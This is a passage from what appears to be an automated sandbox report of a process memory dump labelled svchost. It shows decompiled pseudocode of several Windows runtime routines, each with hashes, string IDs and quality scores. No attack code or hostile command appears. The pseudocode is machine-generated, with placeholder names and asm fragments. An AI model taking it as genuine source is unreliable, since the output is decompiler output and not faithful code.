                        					_t172 = ( ~_t90 & 0x0000003c) + 4;
                        					if(_t90 != 0) {
                        						_push(0);
                        						_push(0x14);
                        						_push( &_v44);
                        						_push(3);
                        						_push(_t179);
                        						_push(0xffffffff);
                        						if(E03069730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                        							_push(_t139);
                        							E030EA80D(_t179, 1, _v40, 0);
                        							_t172 = 4;
                        						}
                        					}
                        					_t141 =  &_v72;
                        					if(E030EA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                        						_v64 = _a4;
                        						_t94 =  *(_t179 + 0xc) & 0x40000000;
                        						asm("sbb edi, edi");
                        						_t176 = ( ~_t94 & 0x0000003c) + 4;
                        						if(_t94 != 0) {
                        							_push(0);
                        							_push(0x14);
                        							_push( &_v24);
                        							_push(3);
                        							_push(_t179);
                        							_push(0xffffffff);
                        							if(E03069730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                        								_push(_t141);
                        								E030EA80D(_t179, 1, _v20, 0);
                        								_t176 = 4;
                        							}
                        						}
                        						if(E030EA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                        							goto L11;
                        						} else {
                        							_t177 = _v64;
                        							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                        							_t100 = _v52 + _v52;
                        							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                        							 *(_t132 + 0x10) = _t146;
                        							asm("bsf eax, [esp+0x18]");
                        							_v52 = _t100;
                        							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                        							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                        							_t47 =  &_a8;
                        							 *_t47 = _a8 & 0x00000001;
                        							if( *_t47 == 0) {
                        								E03042280(_t179 + 0x30, _t179 + 0x30);
                        							}
                        							_t147 =  *(_t179 + 0x34);
                        							_t159 =  *(_t179 + 0x38) & 1;
                        							_v68 = 0;
                        							if(_t147 == 0) {
                        								L35:
                        								E0303B090(_t179 + 0x34, _t147, _v68, _t132);
                        								if(_a8 == 0) {
                        									E0303FFB0(_t132, _t177, _t179 + 0x30);
                        								}
                        								asm("lock xadd [eax], ecx");
                        								asm("lock xadd [eax], edx");
                        								_t132 = 0;
                        								_v72 = _v72 & 0;
                        								_v68 = _v72;
                        								if(E03047D50() == 0) {
                        									_t113 = 0x7ffe0388;
                        								} else {
                        									_t177 = _v64;
                        									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        								}
                        								if( *_t113 == _t132) {
                        									_t166 = _v68;
                        									goto L46;
                        								} else {
                        									_t166 = _v68;
                        									E030DFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                        									goto L12;
                        								}
                        							} else {
                        								L23:
                        								while(1) {
                        									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                        										_t122 =  *_t147;
                        										if(_t159 == 0) {
                        											L32:
                        											if(_t122 == 0) {
                        												L34:
                        												_v68 = 0;
                        												goto L35;
                        											}
                        											L33:
                        											_t147 = _t122;
                        											continue;
                        										}
                        										if(_t122 == 0) {
                        											goto L34;
                        										}
                        										_t122 = _t122 ^ _t147;
                        										goto L32;
                        									}
                        									_t122 =  *(_t147 + 4);
                        									if(_t159 == 0) {
                        										L27:
                        										if(_t122 != 0) {
                        											goto L33;
                        										}
                        										L28:
                        										_v68 = 1;
                        										goto L35;
                        									}
                        									if(_t122 == 0) {
                        										goto L28;
                        									}
                        									_t122 = _t122 ^ _t147;
                        									goto L27;
                        								}
                        							}
                        						}
                        					}
                        					_v72 = _v72 & 0x00000000;
                        					goto L11;
                        				}
                        			}





































                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: `$`
                        • API String ID: 0-197956300
                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                        • Instruction ID: 855e9b92b2d68d9dec73ad9228e65dc28bfbc0218e508f6a3f5977596fb2ad07
                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                        • Instruction Fuzzy Hash: EB91BF313053459FE764CE25C940B5BB7E6AFC8714F18892DF9A9CB290E770E904CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E030A51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                        				signed short* _t63;
                        				signed int _t64;
                        				signed int _t65;
                        				signed int _t67;
                        				intOrPtr _t74;
                        				intOrPtr _t84;
                        				intOrPtr _t88;
                        				intOrPtr _t94;
                        				void* _t100;
                        				void* _t103;
                        				intOrPtr _t105;
                        				signed int _t106;
                        				short* _t108;
                        				signed int _t110;
                        				signed int _t113;
                        				signed int* _t115;
                        				signed short* _t117;
                        				void* _t118;
                        				void* _t119;
                        
                        				_push(0x80);
                        				_push(0x31005f0);
                        				E0307D0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                        				_t115 =  *(_t118 + 0xc);
                        				 *(_t118 - 0x7c) = _t115;
                        				 *((char*)(_t118 - 0x65)) = 0;
                        				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                        				_t113 = 0;
                        				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                        				 *((intOrPtr*)(_t118 - 4)) = 0;
                        				_t100 = __ecx;
                        				if(_t100 == 0) {
                        					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                        					E0303EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        					 *((char*)(_t118 - 0x65)) = 1;
                        					_t63 =  *(_t118 - 0x90);
                        					_t101 = _t63[2];
                        					_t64 =  *_t63 & 0x0000ffff;
                        					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                        					L20:
                        					_t65 = _t64 >> 1;
                        					L21:
                        					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                        					if(_t108 == 0) {
                        						L27:
                        						 *_t115 = _t65 + 1;
                        						_t67 = 0xc0000023;
                        						L28:
                        						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                        						L29:
                        						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                        						E030A53CA(0);
                        						return E0307D130(0, _t113, _t115);
                        					}
                        					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                        						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                        							 *_t108 = 0;
                        						}
                        						goto L27;
                        					}
                        					 *_t115 = _t65;
                        					_t115 = _t65 + _t65;
                        					E0306F3E0(_t108, _t101, _t115);
                        					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                        					_t67 = 0;
                        					goto L28;
                        				}
                        				_t103 = _t100 - 1;
                        				if(_t103 == 0) {
                        					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                        					_t74 = E03043690(1, _t117, 0x3001810, _t118 - 0x74);
                        					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                        					_t101 = _t117[2];
                        					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                        					if(_t74 < 0) {
                        						_t64 =  *_t117 & 0x0000ffff;
                        						_t115 =  *(_t118 - 0x7c);
                        						goto L20;
                        					}
                        					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                        					_t115 =  *(_t118 - 0x7c);
                        					goto L21;
                        				}
                        				if(_t103 == 1) {
                        					_t105 = 4;
                        					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                        					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                        					_push(_t118 - 0x70);
                        					_push(0);
                        					_push(0);
                        					_push(_t105);
                        					_push(_t118 - 0x78);
                        					_push(0x6b);
                        					 *((intOrPtr*)(_t118 - 0x64)) = E0306AA90();
                        					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                        					_t113 = L03044620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                        					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                        					if(_t113 != 0) {
                        						_push(_t118 - 0x70);
                        						_push( *((intOrPtr*)(_t118 - 0x70)));
                        						_push(_t113);
                        						_push(4);
                        						_push(_t118 - 0x78);
                        						_push(0x6b);
                        						_t84 = E0306AA90();
                        						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                        						if(_t84 < 0) {
                        							goto L29;
                        						}
                        						_t110 = 0;
                        						_t106 = 0;
                        						while(1) {
                        							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                        							 *(_t118 - 0x88) = _t106;
                        							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                        								break;
                        							}
                        							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                        							_t106 = _t106 + 1;
                        						}
                        						_t88 = E030A500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                        						_t119 = _t119 + 0x1c;
                        						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                        						if(_t88 < 0) {
                        							goto L29;
                        						}
                        						_t101 = _t118 - 0x3c;
                        						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                        						goto L21;
                        					}
                        					_t67 = 0xc0000017;
                        					goto L28;
                        				}
                        				_push(0);
                        				_push(0x20);
                        				_push(_t118 - 0x60);
                        				_push(0x5a);
                        				_t94 = E03069860();
                        				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                        				if(_t94 < 0) {
                        					goto L29;
                        				}
                        				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                        					_t101 = L"Legacy";
                        					_push(6);
                        				} else {
                        					_t101 = L"UEFI";
                        					_push(4);
                        				}
                        				_pop(_t65);
                        				goto L21;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: Legacy$UEFI
                        • API String ID: 2994545307-634100481
                        • Opcode ID: bd8ffea0dab1e4b035066e8beb6d84962fabc44d05456e8ef6055e0e1b9f8f0f
                        • Instruction ID: a025988f6b437b8e8d43797c8a0c1603eeffd925536d584a500d1f9ec86928e4
                        • Opcode Fuzzy Hash: bd8ffea0dab1e4b035066e8beb6d84962fabc44d05456e8ef6055e0e1b9f8f0f
                        • Instruction Fuzzy Hash: F5516DB2A02B089FDB24DFA8DC40BAEB7F8BF89740F14446DE589EB251D6719901CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E0304B944(signed int* __ecx, char __edx) {
                        				signed int _v8;
                        				signed int _v16;
                        				signed int _v20;
                        				char _v28;
                        				signed int _v32;
                        				char _v36;
                        				signed int _v40;
                        				intOrPtr _v44;
                        				signed int* _v48;
                        				signed int _v52;
                        				signed int _v56;
                        				intOrPtr _v60;
                        				intOrPtr _v64;
                        				intOrPtr _v68;
                        				intOrPtr _v72;
                        				intOrPtr _v76;
                        				char _v77;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr* _t65;
                        				intOrPtr _t67;
                        				intOrPtr _t68;
                        				char* _t73;
                        				intOrPtr _t77;
                        				intOrPtr _t78;
                        				signed int _t82;
                        				intOrPtr _t83;
                        				void* _t87;
                        				char _t88;
                        				intOrPtr* _t89;
                        				intOrPtr _t91;
                        				void* _t97;
                        				intOrPtr _t100;
                        				void* _t102;
                        				void* _t107;
                        				signed int _t108;
                        				intOrPtr* _t112;
                        				void* _t113;
                        				intOrPtr* _t114;
                        				intOrPtr _t115;
                        				intOrPtr _t116;
                        				intOrPtr _t117;
                        				signed int _t118;
                        				void* _t130;
                        
                        				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                        				_v8 =  *0x311d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                        				_t112 = __ecx;
                        				_v77 = __edx;
                        				_v48 = __ecx;
                        				_v28 = 0;
                        				_t5 = _t112 + 0xc; // 0x575651ff
                        				_t105 =  *_t5;
                        				_v20 = 0;
                        				_v16 = 0;
                        				if(_t105 == 0) {
                        					_t50 = _t112 + 4; // 0x5de58b5b
                        					_t60 =  *__ecx |  *_t50;
                        					if(( *__ecx |  *_t50) != 0) {
                        						 *__ecx = 0;
                        						__ecx[1] = 0;
                        						if(E03047D50() != 0) {
                        							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        						} else {
                        							_t65 = 0x7ffe0386;
                        						}
                        						if( *_t65 != 0) {
                        							E030F8CD6(_t112);
                        						}
                        						_push(0);
                        						_t52 = _t112 + 0x10; // 0x778df98b
                        						_push( *_t52);
                        						_t60 = E03069E20();
                        					}
                        					L20:
                        					_pop(_t107);
                        					_pop(_t113);
                        					_pop(_t87);
                        					return E0306B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                        				}
                        				_t8 = _t112 + 8; // 0x8b000cc2
                        				_t67 =  *_t8;
                        				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                        				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                        				_t108 =  *(_t67 + 0x14);
                        				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                        				_t105 = 0x2710;
                        				asm("sbb eax, edi");
                        				_v44 = _t88;
                        				_v52 = _t108;
                        				_t60 = E0306CE00(_t97, _t68, 0x2710, 0);
                        				_v56 = _t60;
                        				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                        					L3:
                        					 *(_t112 + 0x44) = _t60;
                        					_t105 = _t60 * 0x2710 >> 0x20;
                        					 *_t112 = _t88;
                        					 *(_t112 + 4) = _t108;
                        					_v20 = _t60 * 0x2710;
                        					_v16 = _t60 * 0x2710 >> 0x20;
                        					if(_v77 != 0) {
                        						L16:
                        						_v36 = _t88;
                        						_v32 = _t108;
                        						if(E03047D50() != 0) {
                        							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        						} else {
                        							_t73 = 0x7ffe0386;
                        						}
                        						if( *_t73 != 0) {
                        							_t105 = _v40;
                        							E030F8F6A(_t112, _v40, _t88, _t108);
                        						}
                        						_push( &_v28);
                        						_push(0);
                        						_push( &_v36);
                        						_t48 = _t112 + 0x10; // 0x778df98b
                        						_push( *_t48);
                        						_t60 = E0306AF60();
                        						goto L20;
                        					} else {
                        						_t89 = 0x7ffe03b0;
                        						do {
                        							_t114 = 0x7ffe0010;
                        							do {
                        								_t77 =  *0x3118628; // 0x0
                        								_v68 = _t77;
                        								_t78 =  *0x311862c; // 0x0
                        								_v64 = _t78;
                        								_v72 =  *_t89;
                        								_v76 =  *((intOrPtr*)(_t89 + 4));
                        								while(1) {
                        									_t105 =  *0x7ffe000c;
                        									_t100 =  *0x7ffe0008;
                        									if(_t105 ==  *_t114) {
                        										goto L8;
                        									}
                        									asm("pause");
                        								}
                        								L8:
                        								_t89 = 0x7ffe03b0;
                        								_t115 =  *0x7ffe03b0;
                        								_t82 =  *0x7FFE03B4;
                        								_v60 = _t115;
                        								_t114 = 0x7ffe0010;
                        								_v56 = _t82;
                        							} while (_v72 != _t115 || _v76 != _t82);
                        							_t83 =  *0x3118628; // 0x0
                        							_t116 =  *0x311862c; // 0x0
                        							_v76 = _t116;
                        							_t117 = _v68;
                        						} while (_t117 != _t83 || _v64 != _v76);
                        						asm("sbb edx, [esp+0x24]");
                        						_t102 = _t100 - _v60 - _t117;
                        						_t112 = _v48;
                        						_t91 = _v44;
                        						asm("sbb edx, eax");
                        						_t130 = _t105 - _v52;
                        						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                        							_t88 = _t102 - _t91;
                        							asm("sbb edx, edi");
                        							_t108 = _t105;
                        						} else {
                        							_t88 = 0;
                        							_t108 = 0;
                        						}
                        						goto L16;
                        					}
                        				} else {
                        					if( *(_t112 + 0x44) == _t60) {
                        						goto L20;
                        					}
                        					goto L3;
                        				}
                        			}

                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0304B9A5
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 885266447-0
                        • Opcode ID: a80b6f89bf3399b2406a15ea8775892bfee5f69eebb44a2ef1547bf2854fe98b
                        • Instruction ID: e35c4b5f45b4c0fe063d7dbe1752ac5270d090b53a0d88c5741e00d0204b9456
                        • Opcode Fuzzy Hash: a80b6f89bf3399b2406a15ea8775892bfee5f69eebb44a2ef1547bf2854fe98b
                        • Instruction Fuzzy Hash: EB5146B1A0A344CFC724DF29C08092AFBF9BB88600F188D6EE5D587354D771EA44CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E0302B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                        				signed int _t65;
                        				signed short _t69;
                        				intOrPtr _t70;
                        				signed short _t85;
                        				void* _t86;
                        				signed short _t89;
                        				signed short _t91;
                        				intOrPtr _t92;
                        				intOrPtr _t97;
                        				intOrPtr* _t98;
                        				signed short _t99;
                        				signed short _t101;
                        				void* _t102;
                        				char* _t103;
                        				signed short _t104;
                        				intOrPtr* _t110;
                        				void* _t111;
                        				void* _t114;
                        				intOrPtr* _t115;
                        
                        				_t109 = __esi;
                        				_t108 = __edi;
                        				_t106 = __edx;
                        				_t95 = __ebx;
                        				_push(0x90);
                        				_push(0x30ff7a8);
                        				E0307D0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                        				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                        				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                        				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                        				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                        				if(__edx == 0xffffffff) {
                        					L6:
                        					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                        					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                        					__eflags = _t65 & 0x00000002;
                        					if((_t65 & 0x00000002) != 0) {
                        						L3:
                        						L4:
                        						return E0307D130(_t95, _t108, _t109);
                        					}
                        					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                        					_t108 = 0;
                        					_t109 = 0;
                        					_t95 = 0;
                        					__eflags = 0;
                        					while(1) {
                        						__eflags = _t95 - 0x200;
                        						if(_t95 >= 0x200) {
                        							break;
                        						}
                        						E0306D000(0x80);
                        						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                        						_t108 = _t115;
                        						_t95 = _t95 - 0xffffff80;
                        						_t17 = _t114 - 4;
                        						 *_t17 =  *(_t114 - 4) & 0x00000000;
                        						__eflags =  *_t17;
                        						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                        						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                        						_t102 = _t110 + 1;
                        						do {
                        							_t85 =  *_t110;
                        							_t110 = _t110 + 1;
                        							__eflags = _t85;
                        						} while (_t85 != 0);
                        						_t111 = _t110 - _t102;
                        						_t21 = _t95 - 1; // -129
                        						_t86 = _t21;
                        						__eflags = _t111 - _t86;
                        						if(_t111 > _t86) {
                        							_t111 = _t86;
                        						}
                        						E0306F3E0(_t108, _t106, _t111);
                        						_t115 = _t115 + 0xc;
                        						_t103 = _t111 + _t108;
                        						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                        						_t89 = _t95 - _t111;
                        						__eflags = _t89;
                        						_push(0);
                        						if(_t89 == 0) {
                        							L15:
                        							_t109 = 0xc000000d;
                        							goto L16;
                        						} else {
                        							__eflags = _t89 - 0x7fffffff;
                        							if(_t89 <= 0x7fffffff) {
                        								L16:
                        								 *(_t114 - 0x94) = _t109;
                        								__eflags = _t109;
                        								if(_t109 < 0) {
                        									__eflags = _t89;
                        									if(_t89 != 0) {
                        										 *_t103 = 0;
                        									}
                        									L26:
                        									 *(_t114 - 0xa0) = _t109;
                        									 *(_t114 - 4) = 0xfffffffe;
                        									__eflags = _t109;
                        									if(_t109 >= 0) {
                        										L31:
                        										_t98 = _t108;
                        										_t39 = _t98 + 1; // 0x1
                        										_t106 = _t39;
                        										do {
                        											_t69 =  *_t98;
                        											_t98 = _t98 + 1;
                        											__eflags = _t69;
                        										} while (_t69 != 0);
                        										_t99 = _t98 - _t106;
                        										__eflags = _t99;
                        										L34:
                        										_t70 =  *[fs:0x30];
                        										__eflags =  *((char*)(_t70 + 2));
                        										if( *((char*)(_t70 + 2)) != 0) {
                        											L40:
                        											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                        											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                        											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                        											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                        											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                        											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                        											 *(_t114 - 4) = 1;
                        											_push(_t114 - 0x74);
                        											L0307DEF0(_t99, _t106);
                        											 *(_t114 - 4) = 0xfffffffe;
                        											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                        											goto L3;
                        										}
                        										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                        										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                        											goto L40;
                        										}
                        										_push( *((intOrPtr*)(_t114 + 8)));
                        										_push( *((intOrPtr*)(_t114 - 0x9c)));
                        										_push(_t99 & 0x0000ffff);
                        										_push(_t108);
                        										_push(1);
                        										_t101 = E0306B280();
                        										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                        										if( *((char*)(_t114 + 0x14)) == 1) {
                        											__eflags = _t101 - 0x80000003;
                        											if(_t101 == 0x80000003) {
                        												E0306B7E0(1);
                        												_t101 = 0;
                        												__eflags = 0;
                        											}
                        										}
                        										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                        										goto L4;
                        									}
                        									__eflags = _t109 - 0x80000005;
                        									if(_t109 == 0x80000005) {
                        										continue;
                        									}
                        									break;
                        								}
                        								 *(_t114 - 0x90) = 0;
                        								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                        								_t91 = E0306E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                        								_t115 = _t115 + 0x10;
                        								_t104 = _t91;
                        								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                        								__eflags = _t104;
                        								if(_t104 < 0) {
                        									L21:
                        									_t109 = 0x80000005;
                        									 *(_t114 - 0x90) = 0x80000005;
                        									L22:
                        									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                        									L23:
                        									 *(_t114 - 0x94) = _t109;
                        									goto L26;
                        								}
                        								__eflags = _t104 - _t92;
                        								if(__eflags > 0) {
                        									goto L21;
                        								}
                        								if(__eflags == 0) {
                        									goto L22;
                        								}
                        								goto L23;
                        							}
                        							goto L15;
                        						}
                        					}
                        					__eflags = _t109;
                        					if(_t109 >= 0) {
                        						goto L31;
                        					}
                        					__eflags = _t109 - 0x80000005;
                        					if(_t109 != 0x80000005) {
                        						goto L31;
                        					}
                        					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                        					_t38 = _t95 - 1; // -129
                        					_t99 = _t38;
                        					goto L34;
                        				}
                        				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                        					__eflags = __edx - 0x65;
                        					if(__edx != 0x65) {
                        						goto L2;
                        					}
                        					goto L6;
                        				}
                        				L2:
                        				_push( *((intOrPtr*)(_t114 + 8)));
                        				_push(_t106);
                        				if(E0306A890() != 0) {
                        					goto L6;
                        				}
                        				goto L3;
                        			}























                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: _vswprintf_s
                        • String ID:
                        • API String ID: 677850445-0
                        • Opcode ID: ee894bcffb4bce44d2c99392b0ee9777164c9ba67bf256492e521aa5d3e72b57
                        • Instruction ID: 5693fa7f19c3d50f514d6a649ba2829b98d0450e67632d2e0003d740c07c3c7b
                        • Opcode Fuzzy Hash: ee894bcffb4bce44d2c99392b0ee9777164c9ba67bf256492e521aa5d3e72b57
                        • Instruction Fuzzy Hash: 64510F75D0626ACFDB31EF69C840BAEBBF0BF40310F1845A9D899AB281D73049468B90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 84%
                        			E03052581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                        				signed int _v8;
                        				signed int _v16;
                        				unsigned int _v24;
                        				void* _v28;
                        				signed int _v32;
                        				unsigned int _v36;
                        				signed int _v37;
                        				signed int _v40;
                        				signed int _v44;
                        				signed int _v48;
                        				signed int _v52;
                        				signed int _v56;
                        				intOrPtr _v60;
                        				signed int _v64;
                        				signed int _v68;
                        				signed int _v72;
                        				signed int _v76;
                        				signed int _v80;
                        				signed int _t228;
                        				signed int _t232;
                        				void* _t233;
                        				signed int _t236;
                        				void* _t237;
                        				void* _t238;
                        				signed int _t245;
                        				signed int _t247;
                        				intOrPtr _t249;
                        				signed int _t252;
                        				signed int _t259;
                        				signed int _t262;
                        				signed int _t270;
                        				signed int _t276;
                        				signed int _t278;
                        				signed int* _t281;
                        				signed int* _t283;
                        				signed int _t284;
                        				unsigned int _t287;
                        				signed int _t291;
                        				signed int _t295;
                        				signed int _t299;
                        				intOrPtr _t311;
                        				signed int _t320;
                        				signed int _t322;
                        				signed int _t323;
                        				signed int _t327;
                        				signed int _t328;
                        				void* _t330;
                        				signed int _t331;
                        				signed int _t333;
                        				signed int _t335;
                        				void* _t336;
                        				signed int _t339;
                        
                        				_t333 = _t335;
                        				_t336 = _t335 - 0x4c;
                        				_v8 =  *0x311d360 ^ _t333;
                        				_push(__ebx);
                        				_push(__esi);
                        				_push(__edi);
                        				_t327 = 0x311b2e8;
                        				_v56 = _a4;
                        				_v48 = __edx;
                        				_v60 = __ecx;
                        				_t287 = 0;
                        				_v80 = 0;
                        				asm("movsd");
                        				_v64 = 0;
                        				_v76 = 0;
                        				_v72 = 0;
                        				asm("movsd");
                        				_v44 = 0;
                        				_v52 = 0;
                        				_v68 = 0;
                        				asm("movsd");
                        				_v32 = 0;
                        				_v36 = 0;
                        				asm("movsd");
                        				_v16 = 0;
                        				_t276 = 0x48;
                        				_t309 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                        				_t320 = 0;
                        				_v37 = _t309;
                        				if(_v48 <= 0) {
                        					L16:
                        					_t45 = _t276 - 0x48; // 0x0
                        					__eflags = _t45 - 0xfffe;
                        					if(_t45 > 0xfffe) {
                        						_t328 = 0xc0000106;
                        						goto L32;
                        					} else {
                        						_t327 = L03044620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t276);
                        						_v52 = _t327;
                        						__eflags = _t327;
                        						if(_t327 == 0) {
                        							_t328 = 0xc0000017;
                        							goto L32;
                        						} else {
                        							 *(_t327 + 0x44) =  *(_t327 + 0x44) & 0x00000000;
                        							_t50 = _t327 + 0x48; // 0x48
                        							_t322 = _t50;
                        							_t309 = _v32;
                        							 *(_t327 + 0x3c) = _t276;
                        							_t278 = 0;
                        							 *((short*)(_t327 + 0x30)) = _v48;
                        							__eflags = _t309;
                        							if(_t309 != 0) {
                        								 *(_t327 + 0x18) = _t322;
